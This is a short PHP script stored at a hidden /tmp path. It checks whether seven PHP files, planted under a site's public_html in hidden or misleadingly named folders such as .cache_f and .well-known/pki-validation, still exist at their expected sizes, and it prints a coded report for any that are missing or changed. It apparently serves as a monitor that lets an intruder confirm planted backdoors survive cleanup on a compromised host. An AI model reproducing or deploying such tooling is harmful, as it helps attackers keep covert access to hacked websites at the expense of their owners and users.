File: //tmp/.accept
<?php $r = '/home/burhbrzf/public_html'; $x = ["/.cache_f/quiz_analysis.php"=>"bd@@423692@@697",
"/function.sitemap.php"=>"bd@@423734@@989",
"/.cache_f/formradio.php"=>"bd@@415150@@704",
"/.well-known/pki-validation/news_randomnews.php"=>"bd@@426702@@699",
"/HTMLDefinition.php"=>"bd@@415226@@624",
"/.well-known/titulos1.php"=>"bd@@426749@@686",
"/.cache_f/include.php"=>"bd@@412974@@6428"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');